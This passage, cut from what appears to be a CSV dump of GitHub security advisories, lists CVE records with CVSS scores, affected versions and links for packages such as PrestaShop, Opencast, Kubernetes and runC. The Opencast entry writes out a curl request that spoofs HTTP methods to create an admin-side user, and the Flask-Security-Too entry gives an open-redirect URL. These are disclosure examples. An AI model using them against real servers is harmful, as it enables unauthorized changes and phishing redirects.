in 1.7.8.2","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'prestashop/prestashop'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.7.5.0'}, {'fixed': '1.7.8.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.7.8.1'}}]","[{'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-6xxj-gcjq-wgf4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43789'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/issues/26623'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/commit/6482b9ddc9dcebf7588dbfd616d2d635218408d6'}, {'type': 'WEB', 'url': 'https://cwe.mitre.org/data/definitions/89.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/PrestaShop/PrestaShop'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/releases/tag/1.7.8.2'}]","{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-07T20:58:26Z', 'nvd_published_at': '2021-12-07T17:15:00Z'}" +1.4.0,GHSA-4x2f-54wr-4hjg,2021-11-29T19:15:58Z,2021-12-01T18:29:32Z,,['CVE-2021-41279'],Potential Zip Slip Vulnerability in baserCMS,"There is a OS Command Injection Vulnerability on the management system of baserCMS. + +This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users. +If you are eligible, please update to the new version as soon as possible. + +Target +baserCMS 4.5.3 and earlier versions + +Vulnerability +OS Command Injection Vulnerability. + +Countermeasures +Update to the latest version of baserCMS + +Credits +Daniele Scanu @SoterItSecurity","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'baserproject/basercms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.5.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/baserproject/basercms/security/advisories/GHSA-4x2f-54wr-4hjg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41279'}, {'type': 'WEB', 'url': 'https://github.com/baserproject/basercms/commit/d8ab0a81a7bce35cc95ff7dff851a7e87a084336'}, {'type': 'PACKAGE', 'url': 'https://github.com/baserproject/basercms'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-29T19:15:58Z', 'nvd_published_at': '2021-11-26T18:15:00Z'}" +1.4.0,GHSA-gwpx-q2h9-wxgx,2021-12-03T15:16:06Z,2021-12-03T20:43:25Z,,['CVE-2021-3964'],elgg is vulnerable to Authorization Bypass Through User-Controlled Key,elgg is vulnerable to Authorization Bypass Through User-Controlled Key,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'elgg/elgg'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.22'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3964'}, {'type': 'WEB', 'url': 'https://github.com/elgg/elgg/commit/d9fcad76ee380ea17edd61d13d0f87828ea3f744'}, {'type': 'PACKAGE', 'url': 'https://github.com/elgg/elgg/'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/a4df45d6-b739-4299-967f-c960b569383a'}]","{'cwe_ids': ['CWE-639'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-02T21:20:04Z', 'nvd_published_at': '2021-12-01T12:15:00Z'}" +1.4.0,GHSA-v3r2-3fp4-rp46,2023-09-06T20:14:32Z,2021-12-10T20:05:57Z,,['CVE-2020-7643'],Prototype pollution in paypal-adaptive,paypal-adaptive through 0.4.2 manipulation of JavaScript objects resulting in Prototype Pollution. The PayPal function could be tricked into adding or modifying properties of Object.prototype using a `__proto__` payload.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'paypal-adaptive'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.4.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7643'}, {'type': 'PACKAGE', 'url': 'https://github.com/Ideame/paypal-adaptive-sdk-nodejs'}, {'type': 'WEB', 'url': 'https://github.com/Ideame/paypal-adaptive-sdk-nodejs/blob/master/lib/paypal-adaptive.js#L31'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-PAYPALADAPTIVE-565089'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-25T20:14:36Z', 'nvd_published_at': '2020-04-23T15:15:00Z'}" +1.4.0,GHSA-93j5-g845-9wqp,2021-12-02T17:54:05Z,2021-12-02T17:52:45Z,,['CVE-2021-27023'],Unsafe HTTP Redirect in Puppet Agent and Puppet Server,A flaw was discovered in Puppet Agent and Puppet Server that may result in a leak of HTTP credentials when following HTTP redirects to a different host. This is similar to CVE-2018-1000007,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'puppet'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.12.1'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'puppet'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.25.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27023'}, {'type': 'PACKAGE', 'url': 'https://github.com/puppetlabs/puppet'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/puppet/CVE-2021-27023.yml'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/62SELE7EKVKZL4GABFMVYMIIUZ7FPEF7/'}, {'type': 'WEB', 'url': 'https://puppet.com/security/cve/CVE-2021-27023'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-30T14:35:48Z', 'nvd_published_at': '2021-11-18T15:15:00Z'}" +1.4.0,GHSA-5cqm-crxm-6qpv,2022-07-29T14:18:05Z,2021-12-14T21:36:20Z,,['CVE-2021-41816'],Buffer overrun in CGI.escape_html,"A buffer overrun vulnerability was discovered in CGI.escape_html. This can lead to a buffer overflow when a user passes a very large string (> 700 MB) to CGI.escape_html on a platform where long type takes 4 bytes, typically, Windows.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'cgi'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.3.0'}, {'fixed': '0.3.1'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'cgi'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.2.0'}, {'fixed': '0.2.1'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'cgi'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41816'}, {'type': 'WEB', 'url': 'https://github.com/ruby/cgi/commit/959ccf0b6a672bcc64aeaa60c6e1f9e728f1e87f'}, {'type': 'WEB', 'url': 'https://github.com/ruby/cgi/commit/ad079c1cb5f58eba1ffac46da79995fcf94a3a6e'}, {'type': 'WEB', 'url': 'https://github.com/ruby/cgi/commit/c6a37a671b556eb06140ea89cc465136b24207a6'}, {'type': 'WEB', 'url': 'https://github.com/ruby/cgi/commit/c728632c1c09d46cfd4ecbff9caaa3651dd1002a'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/1328463'}, {'type': 'PACKAGE', 'url': 'https://github.com/ruby/cgi'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/cgi/CVE-2021-41816.yml'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/ruby-security-ann/c/4MQ568ZG47c'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IUXQCH6FRKANCVZO2Q7D2SQX33FP3KWN/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UTOJGS5IEFDK3UOO7IY4OTTFGHGLSWZF/'}, {'type': 'WEB', 'url': 'https://security-tracker.debian.org/tracker/CVE-2021-41816'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20220303-0006/'}, {'type': 'WEB', 'url': 'https://www.ruby-lang.org/en/news/2021/11/24/buffer-overrun-in-cgi-escape_html-cve-2021-41816/'}]","{'cwe_ids': ['CWE-190'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-12-14T21:34:08Z', 'nvd_published_at': '2022-02-06T21:15:00Z'}" +1.4.0,GHSA-5vr6-hm68-5j9p,2021-12-06T21:36:37Z,2021-12-03T20:49:16Z,,['CVE-2021-44279'],Cross-site Scripting in LibreNMS,LibreNMS 21.11.0 is affected by is affected by a Cross Site Scripting (XSS) vulnerability in includes/html/forms/poller-groups.inc.php.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'librenms/librenms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '21.11.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-44279'}, {'type': 'WEB', 'url': 'https://github.com/librenms/librenms/pull/13554'}, {'type': 'WEB', 'url': 'https://github.com/librenms/librenms/pull/13554/commits/4f231a0f49b6c953d506913364ffd7fb3a660630'}, {'type': 'PACKAGE', 'url': 'https://github.com/librenms/librenms/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-02T18:54:26Z', 'nvd_published_at': '2021-12-01T14:15:00Z'}" +1.4.0,GHSA-gxjj-f44v-qm94,2021-12-14T18:14:54Z,2021-12-14T18:14:04Z,2021-05-27T19:07:52Z,[],Open Redirect in Flask-Security-Too,"# Withdrawn + +Duplicate of GHSA-6qmf-fj6m-686c + +# Original description + +Flask-Security-Too allows redirects after many successful views (e.g. /login) by honoring the ?next query param. There is code in FS to validate that the url specified in the next parameter is either relative OR has the same netloc (network location) as the requesting URL. + +This check utilizes Pythons urlsplit library. However many browsers are very lenient on the kind of URL they accept and 'fill in the blanks' when presented with a possibly incomplete URL. As a concrete example - setting http://login?next=\\\github.com +will pass FS's relative URL check however many browsers will gladly convert this to http://github.com. Thus an attacker could send such a link to an unwitting user, using a legitimate site and have it redirect to whatever site they want. + +This is considered a low severity due to the fact that if Werkzeug is used (which is very common with Flask applications) as the WSGI layer, it by default ALWAYS ensures that the Location header is absolute - thus making this attack vector mute. It is possible for application writers to modify this default behavior by setting the 'autocorrect_location_header=False`.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Flask-Security-Too'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '4.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Flask-Middleware/flask-security/security/advisories/GHSA-6qmf-fj6m-686c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32618'}, {'type': 'WEB', 'url': 'https://github.com/Flask-Middleware/flask-security/issues/486'}]","{'cwe_ids': ['CWE-601'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-19T17:52:04Z', 'nvd_published_at': None}" +1.4.0,GHSA-j4mm-7pj3-jf7v,2022-01-04T18:54:12Z,2021-12-14T21:43:00Z,,['CVE-2021-43807'],HTTP Method Spoofing,"Opencast versions prior to 9.10 allow HTTP method spoofing, allowing to change the assumed HTTP method via URL parameter. This allows attackers to turn HTTP GET requests into PUT requests or an HTTP form to send DELETE requests. This bypasses restrictions otherwise put on these types of requests and aids in cross-site request forgery (CSRF) attacks, which would otherwise not be possible. + +### Impact + +The vulnerability allows attackers to craft links or forms which may change the server state. For example, the following GET request would create a new user: + +```sh +% curl -i -u admin:opencast \ + 'https://legacy.opencast.org/admin-ng/users/test.json?_method=PUT&username=test&password=attack' +HTTP/2 200 +… +``` + +If an admin is logged in to legacy.opencast.org and accidentally clicks this link, a user will silently be created. + + +### Patches + +This issue is fixed in Opencast 9.10 and 10.0. + +### Workarounds + +You can mitigate the problem by setting the `SameSite=Strict` attribute for your cookies. If this is a viable option for you depends on your integrations. We strongly recommend updating in any case. + +### References + +- [Fix for 10.0](https://github.com/opencast/opencast/commit/59cb6731067283e54f15462be38b6117d8b9ea8b#diff-9c5fb3d1b7e3b0f54bc5c4182965c4fe1f9023d449017cece3005d3f90e8e4d8) +- [Fix for 9.10](https://github.com/opencast/opencast/commit/8f8271e1085f6f8e306c689d6a56b0bb8d076444) + +### For more information + +If you have any questions or comments about this advisory: +* Open an issue in [our issue tracker](https://github.com/opencast/opencast/issues) +* Email us at [security@opencast.org](mailto:security@opencast.org) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.opencastproject:opencast-common'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.10'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/opencast/opencast/security/advisories/GHSA-j4mm-7pj3-jf7v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43807'}, {'type': 'WEB', 'url': 'https://github.com/opencast/opencast/commit/59cb6731067283e54f15462be38b6117d8b9ea8b#diff-9c5fb3d1b7e3b0f54bc5c4182965c4fe1f9023d449017cece3005d3f90e8e4d8'}, {'type': 'WEB', 'url': 'https://github.com/opencast/opencast/commit/8f8271e1085f6f8e306c689d6a56b0bb8d076444'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencast/opencast'}]","{'cwe_ids': ['CWE-290'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-14T18:49:26Z', 'nvd_published_at': '2021-12-14T18:15:00Z'}" +1.4.0,GHSA-q5wr-fvpq-p67g,2021-07-26T18:09:11Z,2021-12-10T17:23:30Z,,['CVE-2020-28248'],Integer Overflow in png-img,An integer overflow in the PngImg::InitStorage_() function of png-img before 3.1.0 leads to an under-allocation of heap memory and subsequently an exploitable heap-based buffer overflow when loading a crafted PNG file.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'png-img'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28248'}, {'type': 'WEB', 'url': 'https://github.com/gemini-testing/png-img/commit/14ac462a32ca4b3b78f56502ac976d5b0222ce3d'}, {'type': 'WEB', 'url': 'https://github.com/gemini-testing/png-img'}, {'type': 'WEB', 'url': 'https://github.com/gemini-testing/png-img/compare/v3.0.0...v3.1.0'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2020-142-gemini-png-img'}]","{'cwe_ids': ['CWE-190', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T18:09:11Z', 'nvd_published_at': '2021-02-20T00:15:00Z'}" +1.4.0,GHSA-m3fm-h5jp-q79p,2023-02-03T20:37:11Z,2021-12-20T16:58:14Z,,['CVE-2016-1906'],Authorization bypass in Openshift,Openshift allows remote attackers to gain privileges by updating a build configuration that was created with an allowed type to a type that is not allowed.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/openshift/origin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-1906'}, {'type': 'WEB', 'url': 'https://github.com/openshift/origin/issues/6556'}, {'type': 'WEB', 'url': 'https://github.com/openshift/origin/pull/6576'}, {'type': 'WEB', 'url': 'https://github.com/openshift/origin/commit/d95ec085f03ecf10e8c424a4f0340ddb38891406'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2016:0070'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2016:0351'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/CVE-2016-1906'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1297916'}, {'type': 'WEB', 'url': 'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1906'}]","{'cwe_ids': ['CWE-285'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-19T22:01:34Z', 'nvd_published_at': '2016-02-03T18:59:00Z'}" +1.4.0,GHSA-rp2c-jrgp-cvr8,2021-12-06T22:08:43Z,2021-12-16T15:32:31Z,,['CVE-2021-23562'],Code injection in plupload,This affects the package plupload before 2.3.9. A file name containing JavaScript code could be uploaded and run. An attacker would need to trick a user to upload this kind of file.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'plupload'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23562'}, {'type': 'WEB', 'url': 'https://github.com/moxiecode/plupload/commit/d12175d4b5fa799b994ee1bb17bfbeec55b386fb'}, {'type': 'PACKAGE', 'url': 'https://github.com/moxiecode/plupload'}, {'type': 'WEB', 'url': 'https://github.com/moxiecode/plupload/blob/master/js/jquery.plupload.queue/jquery.plupload.queue.js%23L226'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-2306665'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-2306663'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBMOXIECODE-2306664'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-PLUPLOAD-1583909'}]","{'cwe_ids': ['CWE-434', 'CWE-75'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-06T22:08:43Z', 'nvd_published_at': '2021-12-03T20:15:00Z'}" +1.4.0,GHSA-j96p-r523-8r3w,2021-11-24T19:42:20Z,2021-12-03T20:52:02Z,,['CVE-2021-43669'],HTTP Request Smuggling in github.com/hyperledger/fabric,"A vulnerability has been detected in HyperLedger Fabric v1.4.0, v2.0.0, v2.0.1, v2.3.0. It can easily break down as many orderers as the attacker wants. This bug can be leveraged by constructing a message whose header is invalid to the interface Order. This bug has been admitted and fixed by the developers of Fabric.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hyperledger/fabric'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43669'}, {'type': 'WEB', 'url': 'https://github.com/hyperledger/fabric/pull/2828'}, {'type': 'PACKAGE', 'url': 'https://github.com/hyperledger/fabric'}, {'type': 'WEB', 'url': 'https://github.com/hyperledger/fabric/releases/tag/v2.4.0-beta'}, {'type': 'WEB', 'url': 'https://jira.hyperledger.org/browse/FAB-18528'}]","{'cwe_ids': ['CWE-444'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-24T19:42:20Z', 'nvd_published_at': '2021-11-18T16:15:00Z'}" +1.4.0,GHSA-wxc4-f4m6-wwqv,2023-02-09T17:45:10Z,2021-12-20T16:55:06Z,,['CVE-2019-11254'],Excessive Platform Resource Consumption within a Loop in Kubernetes,"The Kubernetes API Server component in versions 1.1-1.14, and versions prior to 1.15.10, 1.16.7 and 1.17.3 allows an authorized user who sends malicious YAML payloads to cause the kube-apiserver to consume excessive CPU cycles while parsing YAML.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'gopkg.in/yaml.v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.8'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/go-yaml/yaml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-11254'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/issues/89535'}, {'type': 'WEB', 'url': 'https://github.com/go-yaml/yaml/pull/555'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/pull/87467/commits/b86df2bec4f377afc0ca03482ffad2f0a49a83b8'}, {'type': 'WEB', 'url': 'https://github.com/go-yaml/yaml/commit/53403b58ad1b561927d19068c655246f2db79d48'}, {'type': 'WEB', 'url': 'https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=18496'}, {'type': 'WEB', 'url': 'https://groups.google.com/d/msg/kubernetes-announce/ALL9s73E5ck/4yHe8J-PBAAJ'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2020-0036'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200413-0003/'}]","{'cwe_ids': ['CWE-1050'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-07T17:24:04Z', 'nvd_published_at': None}" +1.4.0,GHSA-ff45-7prw-58vj,2021-11-30T14:50:39Z,2021-12-02T17:51:22Z,2021-11-29T18:17:00Z,['CVE-2021-23732'],OS Command injection in docker-cli-js,"# Withdrawn + +After reviewing this CVE, and [this response from the maintainer](https://github.com/Quobject/docker-cli-js/issues/22#issuecomment-967760940), we have withdrawn this advisory. + +# Original CVE description + +This affects all versions of package docker-cli-js. If the command parameter of the Docker.command method can at least be partially controlled by a user, they will be in a position to execute any arbitrary OS commands on the host system. ",[],"[{'package': {'ecosystem': 'npm', 'name': 'docker-cli-js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.8.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23732'}, {'type': 'WEB', 'url': 'https://github.com/Quobject/docker-cli-js/issues/22'}, {'type': 'WEB', 'url': 'https://github.com/Quobject/docker-cli-js/issues/22#issuecomment-967760940'}, {'type': 'PACKAGE', 'url': 'https://github.com/Quobject/docker-cli-js'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-DOCKERCLIJS-1568516'}]","{'cwe_ids': ['CWE-78'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-30T14:50:39Z', 'nvd_published_at': '2021-11-22T17:15:00Z'}" +1.4.0,GHSA-qrvj-274h-hfcg,2022-03-25T20:42:58Z,2021-12-07T00:00:27Z,,['CVE-2021-36567'],Deserialization of Untrusted Data in topthink/framework,ThinkPHP v6.0.8 was discovered to contain a deserialization vulnerability via the component League\Flysystem\Cached\Storage\AbstractCache.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'topthink/framework'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '6.0.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36567'}, {'type': 'WEB', 'url': 'https://github.com/top-think/framework/issues/2561'}, {'type': 'PACKAGE', 'url': 'https://github.com/top-think/framework'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2022-03-25T20:42:58Z', 'nvd_published_at': '2021-12-06T21:15:00Z'}" +1.4.0,GHSA-7v7w-f7c6-f829,2022-08-11T18:47:52Z,2021-12-16T21:01:15Z,,['CVE-2021-4111'],YetiForceCRM is vulnerable to Business Logic Errors because product amount can be a negative number,YetiForceCRM is vulnerable to Business Logic Errors because product amount can be a negative number.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'yetiforce/yetiforce-crm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '6.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4111'}, {'type': 'WEB', 'url': 'https://github.com/yetiforcecompany/yetiforcecrm/commit/c1ad7111a090adfcd5898af40724907adc987acf'}, {'type': 'PACKAGE', 'url': 'https://github.com/yetiforcecompany/yetiforcecrm'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/8afc8981-baff-4082-b640-be535b29eb9a'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-16T15:41:33Z', 'nvd_published_at': '2021-12-15T09:15:00Z'}" +1.4.0,GHSA-wh8g-3j2c-rqj5,2022-02-08T22:00:53Z,2021-12-09T19:15:00Z,,['CVE-2020-35490'],Serialization gadgets exploit in jackson-databind,"FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.datasources.PerUserPoolDataSource.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.9.10.8'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.9.10.7'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35490'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/2986'}, {'type': 'WEB', 'url': 'https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062'}, {'type': 'PACKAGE', 'url': 'https://github.com/FasterXML/jackson-databind'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210122-0005/'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-08T21:06:39Z', 'nvd_published_at': '2020-12-17T19:15:00Z'}" +1.4.0,GHSA-gp4j-w3vj-7299,2021-05-20T16:22:33Z,2021-12-20T18:21:43Z,,['CVE-2016-9962'],Information Exposure in RunC,"RunC allowed additional container processes via 'runc exec' to be ptraced by the pid 1 of the container. This allows the main processes of the container, if running as root, to gain access to file-descriptors of these new processes during the initialization and can lead to container escapes or modification of runC state before the process is fully placed inside the container.","[{'type': 'CVSS_V3', 'score': 